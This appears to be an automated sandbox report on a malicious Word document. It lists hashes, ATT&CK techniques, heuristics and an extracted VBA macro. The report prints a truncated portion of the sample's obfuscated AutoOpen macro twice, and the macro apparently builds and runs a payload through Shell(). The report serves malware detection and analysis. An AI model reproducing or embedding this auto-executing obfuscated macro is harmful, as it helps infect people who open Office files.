Office (OLE) malware analysis — malicious · c58a2fa536160c4f

MALICIOUS

Office (OLE)

101.4 KB Created: 2018-09-26 07:24:00 Authoring application: Microsoft Office Word First seen: 2019-06-27

MD5: 833e92825df64a697cefa10b4004cb65 SHA-1: 35ee96df1dfea94ecedc4da2ed8b46c89f8efd6c SHA-256: c58a2fa536160c4fb51ab754e711af1e077c964f4c098b03a13e4024bfa76f31

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary code. The macro's obfuscated nature and truncated content prevent a more detailed analysis of its specific payload or target.

Heuristics 5

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 62074 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	62074 bytes
SHA-256: `2ca8fa8d51e73a12205330841da19ebe05d5a5d3d8f65fb4967073c80fa2564d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ZXvczYjD" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim jBjjb(2) jBjjb(0) = MidB(HEzNh + NHvasnAMkwOnjALRQj + fPizp, 659, 183) + Right(zOLbkjPo + ovmNVhrzCQjzPKKpLaD + OZIozTvc, 921) jBjjb(1) = Mid(HtCNP + MzhSQvUWFwJBnwwYD + GnksGwW, 162, 944) + Right(MqmRvI + izpimEwFDQruquhYoaz + YvouY, 417) + MidB(LmqfRJwo + QEjiTHwXNkYjhFqPdX + dfICD, 492, 710) + Left(FajJcpc + cwpDmvIjDIYGcjDLREWm + TPAaF, 304) Dim qumLZs(2) qumLZs(0) = Left(GphaLzzA + mRDiGLDTjIVuiPiusdL + zjFDpU, 344) + Mid(jdwrIo + WYjkltjjjPvbSfkZ + OzOIA, 965, 196) + Left(HtTqHmSn + LXIkCtkCdLXuHZScl + itcWmWn, 782) + MidB(XEujFOMO + HUbjfwzMALbHcojGmzN + zKaLCL, 118, 255) qumLZs(1) = Right(bORsrnan + jwwSvFfHFQtqHYkzBuz + AZzQp, 366) + Mid(ldmDN + MFaFojYJIWPpqiPoSV + qotGHNUj, 149, 328) Dim vTstYR(1) vTstYR(0) = Right(HTDWSKXE + pvUQjQdaKocOwVlqVQATD + lXnzpQ, 852) + MidB(ZQikcwu + ziEFAMflSHpbQjWpdVYkf + pABNWVIc, 92, 54) + MidB(XaRDCab + AvYzbFOVuZjEXikmjwLjszz + RVKDk, 969, 781) + Right(QuQuHdI + SDnTCipFoPjzcrCDWwFjZHj + mrhYzD, 638) Dim GOzzl(2) GOzzl(0) = Right(AXGcK + lmkAntOwjaIbFpijONBrI + ShGbifN, 143) + Right(zHFqrPS + cuAKoUiAVkvcbhkUB + TXJldIqW, 974) GOzzl(1) = Mid(mFnRWR + ANlzkVAOJizSahADqFoiX + pMQJLS, 278, 717) + Left(iZYPnIb + lFLYMoOPJMjOfdjFwL + fzsDbnD, 946) Dim oUToDN(1) oUToDN(0) = MidB(qjzrJD + ZiMdNGimFXmYvJIkrivOB + tvCKlTqc, 461, 136) + Right(Mipjs + XpvZoHMzLdTLKVNiTEvvXCP + WCzDRKv, 55) + Left(NDZTzR + hBrVGwGdctYXYibOZCAOSPM + ukvicPi, 461) + Right(vAznY + ZzoUzLCVkjmYFXiBjOwH + icsNb, 290) Dim JpNhOz(2) JpNhOz(0) = Right(cHfBlVv + aEXnudrKPNSotVEQjsJlG + ocpYNhr, 744) + MidB(EIOMV + ihRnNwuGfUSRqHoP + BjbCsKA, 660, 2) JpNhOz(1) = MidB(JFDZf + SsiHCXErnRHXGaAqlVzwM + JZLPsLI, 265, 953) + Mid(uiDzI + QsfEinYoOFSwaNfYb + wJIJK, 727, 424) + MidB(NfivMvEq + TWuIiTptqSjrRVwYdlCCa + NWofIoBj, 535, 670) + MidB(dqUsS + dnQkSZRuGQUrFTEYh + HqcrUSi, 166, 860) CELrPEMmjiPRav (KeyString(SfNizzqv + YrDXXX + 3 + 21 + 43 + TOLTd + HHqhuu) + FnFIUGj + Qhwuo + KeyString(bFUrK + BuKsszOY + 3 + 24 + 50 + MzkSPcGk + CvWYTzpF) + hwJAkrcdPi + kpaPVKIjC + DjjLkMC + LXztiuj + FhUSXEib + qmtBicvR + QRdnE + EzbizTdK) Dim lOVplq(1) lOVplq(0) = Left(JwArKK + fMuFZoXjiVbUSOZPwo + mDhXnmZU, 823) + Mid(buGPFwt + DVuBJidkvTkiBsRil + iztYcM, 969, 378) + Left(rvpRJ + LEwjvKwbwONfLLrzHkzWiR + tidqsL, 64) + MidB(NiimCbB + FnrfAAaYdMiRuzOzIW + oihKIKF, 168, 958) Dim ZWNIC(2) ZWNIC(0) = MidB(ZTkuaMM + LfwBqfJGkFzAZDsXqDt + zOkkudmO, 652, 643) + MidB(OiTumECS + ZuKiXToORREEwPdzqPSQ + VZdEz, 840, 926) + Right(ppaQGT + TqhJdrnoZUcTGdBuLFPaU + nFYzWiQr, 989) + MidB(trhiQKSb + iLsoFZOSQMdoEpCqLcH + iKMjpEHt, 693, 892) ZWNIC(1) = Mid(jLRECYvK + DdlBVPkTbHDGudzITstA + illJDLt, 127, 347) + Mid(unjrIzb + cFWsTvwOXJdniwaPQOzo + npQRKtS, 447, 225) + Right(OtqHPs + wGHVrMKZMYiRiGfjEiqF + SPEkI, 11) + MidB(tpXjT + ATGKnIffKAjIHAfKZz + DMCZXtrz, 743, 142) Dim Kjvoj(2) Kjvoj(0) = MidB(ZZHQNRd + AJwHviwkCkmOcdjF + rbPNj, 300, 911) + MidB(IuLUzdIY + jzDjZzktokhXKijtOO + vupaU, 230, 712) + Mid(bZrHn + QvBBHEaWCquYiXuHmjW + IUfGw, 371, 191) + Left(ucTNGvrT + SVqvZhHNjHFuimYUYhsVG + aDRwQ, 362) Kjvoj(1) = MidB(whSZFZrz + joioPNISusZAkQXGOPooz + bNSujh, 922, 629) + MidB(TloEqzTV + jhJiSnhZrzlHzlENKdT + EUOzYS, 415, 366) + MidB(ktEkc + OHiqhdquwOHsujdzZAJ + jrzNsr, 310, 553) + Mid(PLcjWqX + VHLBNWWGiTjFAqidaD + nRfBuAG, 136, 25) End Sub Attribute VB_Name = "LpYOidQjnaKzwL" Function hwJAkrcdPi() Dim LMPZz(1) LMPZz(0) = MidB(oPoNi + rLIoGJziRiAkZonHm + TuSLIVfG, 232, 276) + MidB(cRSIKj + iwqcZDpzabzrNWv + TbFUEKYS, 130, 605) + MidB(plPUDpm + pGlmNPZFmPbIsWYOiliUw + XiXJj, 168, 970) + Mid(VThquut + MwhsMahRbjHmmlvCvGHdlO + ohUjsh, 530, 736) Dim kBrSEf(1) kBrSEf(0) = Mid(jLNJjkDp + TOvqZmhLJVsfnuCCtPaF + FXXWB, 297, 514) + MidB(iPwucEb + tdrfZONAmEztjTPUK + uazFfTca, 958, 341) Dim Ml ... (truncated)

SHA-256: 2ca8fa8d51e73a12205330841da19ebe05d5a5d3d8f65fb4967073c80fa2564d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ZXvczYjD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim jBjjb(2)
jBjjb(0) = MidB(HEzNh + NHvasnAMkwOnjALRQj + fPizp, 659, 183) + Right(zOLbkjPo + ovmNVhrzCQjzPKKpLaD + OZIozTvc, 921)
jBjjb(1) = Mid(HtCNP + MzhSQvUWFwJBnwwYD + GnksGwW, 162, 944) + Right(MqmRvI + izpimEwFDQruquhYoaz + YvouY, 417) + MidB(LmqfRJwo + QEjiTHwXNkYjhFqPdX + dfICD, 492, 710) + Left(FajJcpc + cwpDmvIjDIYGcjDLREWm + TPAaF, 304)
   Dim qumLZs(2)
qumLZs(0) = Left(GphaLzzA + mRDiGLDTjIVuiPiusdL + zjFDpU, 344) + Mid(jdwrIo + WYjkltjjjPvbSfkZ + OzOIA, 965, 196) + Left(HtTqHmSn + LXIkCtkCdLXuHZScl + itcWmWn, 782) + MidB(XEujFOMO + HUbjfwzMALbHcojGmzN + zKaLCL, 118, 255)
qumLZs(1) = Right(bORsrnan + jwwSvFfHFQtqHYkzBuz + AZzQp, 366) + Mid(ldmDN + MFaFojYJIWPpqiPoSV + qotGHNUj, 149, 328)
   Dim vTstYR(1)
vTstYR(0) = Right(HTDWSKXE + pvUQjQdaKocOwVlqVQATD + lXnzpQ, 852) + MidB(ZQikcwu + ziEFAMflSHpbQjWpdVYkf + pABNWVIc, 92, 54) + MidB(XaRDCab + AvYzbFOVuZjEXikmjwLjszz + RVKDk, 969, 781) + Right(QuQuHdI + SDnTCipFoPjzcrCDWwFjZHj + mrhYzD, 638)
   Dim GOzzl(2)
GOzzl(0) = Right(AXGcK + lmkAntOwjaIbFpijONBrI + ShGbifN, 143) + Right(zHFqrPS + cuAKoUiAVkvcbhkUB + TXJldIqW, 974)
GOzzl(1) = Mid(mFnRWR + ANlzkVAOJizSahADqFoiX + pMQJLS, 278, 717) + Left(iZYPnIb + lFLYMoOPJMjOfdjFwL + fzsDbnD, 946)
   Dim oUToDN(1)
oUToDN(0) = MidB(qjzrJD + ZiMdNGimFXmYvJIkrivOB + tvCKlTqc, 461, 136) + Right(Mipjs + XpvZoHMzLdTLKVNiTEvvXCP + WCzDRKv, 55) + Left(NDZTzR + hBrVGwGdctYXYibOZCAOSPM + ukvicPi, 461) + Right(vAznY + ZzoUzLCVkjmYFXiBjOwH + icsNb, 290)
   Dim JpNhOz(2)
JpNhOz(0) = Right(cHfBlVv + aEXnudrKPNSotVEQjsJlG + ocpYNhr, 744) + MidB(EIOMV + ihRnNwuGfUSRqHoP + BjbCsKA, 660, 2)
JpNhOz(1) = MidB(JFDZf + SsiHCXErnRHXGaAqlVzwM + JZLPsLI, 265, 953) + Mid(uiDzI + QsfEinYoOFSwaNfYb + wJIJK, 727, 424) + MidB(NfivMvEq + TWuIiTptqSjrRVwYdlCCa + NWofIoBj, 535, 670) + MidB(dqUsS + dnQkSZRuGQUrFTEYh + HqcrUSi, 166, 860)
CELrPEMmjiPRav (KeyString(SfNizzqv + YrDXXX + 3 + 21 + 43 + TOLTd + HHqhuu) + FnFIUGj + Qhwuo + KeyString(bFUrK + BuKsszOY + 3 + 24 + 50 + MzkSPcGk + CvWYTzpF) + hwJAkrcdPi + kpaPVKIjC + DjjLkMC + LXztiuj + FhUSXEib + qmtBicvR + QRdnE + EzbizTdK)
   Dim lOVplq(1)
lOVplq(0) = Left(JwArKK + fMuFZoXjiVbUSOZPwo + mDhXnmZU, 823) + Mid(buGPFwt + DVuBJidkvTkiBsRil + iztYcM, 969, 378) + Left(rvpRJ + LEwjvKwbwONfLLrzHkzWiR + tidqsL, 64) + MidB(NiimCbB + FnrfAAaYdMiRuzOzIW + oihKIKF, 168, 958)
   Dim ZWNIC(2)
ZWNIC(0) = MidB(ZTkuaMM + LfwBqfJGkFzAZDsXqDt + zOkkudmO, 652, 643) + MidB(OiTumECS + ZuKiXToORREEwPdzqPSQ + VZdEz, 840, 926) + Right(ppaQGT + TqhJdrnoZUcTGdBuLFPaU + nFYzWiQr, 989) + MidB(trhiQKSb + iLsoFZOSQMdoEpCqLcH + iKMjpEHt, 693, 892)
ZWNIC(1) = Mid(jLRECYvK + DdlBVPkTbHDGudzITstA + illJDLt, 127, 347) + Mid(unjrIzb + cFWsTvwOXJdniwaPQOzo + npQRKtS, 447, 225) + Right(OtqHPs + wGHVrMKZMYiRiGfjEiqF + SPEkI, 11) + MidB(tpXjT + ATGKnIffKAjIHAfKZz + DMCZXtrz, 743, 142)
   Dim Kjvoj(2)
Kjvoj(0) = MidB(ZZHQNRd + AJwHviwkCkmOcdjF + rbPNj, 300, 911) + MidB(IuLUzdIY + jzDjZzktokhXKijtOO + vupaU, 230, 712) + Mid(bZrHn + QvBBHEaWCquYiXuHmjW + IUfGw, 371, 191) + Left(ucTNGvrT + SVqvZhHNjHFuimYUYhsVG + aDRwQ, 362)
Kjvoj(1) = MidB(whSZFZrz + joioPNISusZAkQXGOPooz + bNSujh, 922, 629) + MidB(TloEqzTV + jhJiSnhZrzlHzlENKdT + EUOzYS, 415, 366) + MidB(ktEkc + OHiqhdquwOHsujdzZAJ + jrzNsr, 310, 553) + Mid(PLcjWqX + VHLBNWWGiTjFAqidaD + nRfBuAG, 136, 25)
End Sub


Attribute VB_Name = "LpYOidQjnaKzwL"
Function hwJAkrcdPi()
Dim LMPZz(1)
LMPZz(0) = MidB(oPoNi + rLIoGJziRiAkZonHm + TuSLIVfG, 232, 276) + MidB(cRSIKj + iwqcZDpzabzrNWv + TbFUEKYS, 130, 605) + MidB(plPUDpm + pGlmNPZFmPbIsWYOiliUw + XiXJj, 168, 970) + Mid(VThquut + MwhsMahRbjHmmlvCvGHdlO + ohUjsh, 530, 736)
   Dim kBrSEf(1)
kBrSEf(0) = Mid(jLNJjkDp + TOvqZmhLJVsfnuCCtPaF + FXXWB, 297, 514) + MidB(iPwucEb + tdrfZONAmEztjTPUK + uazFfTca, 958, 341)
   Dim Ml
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.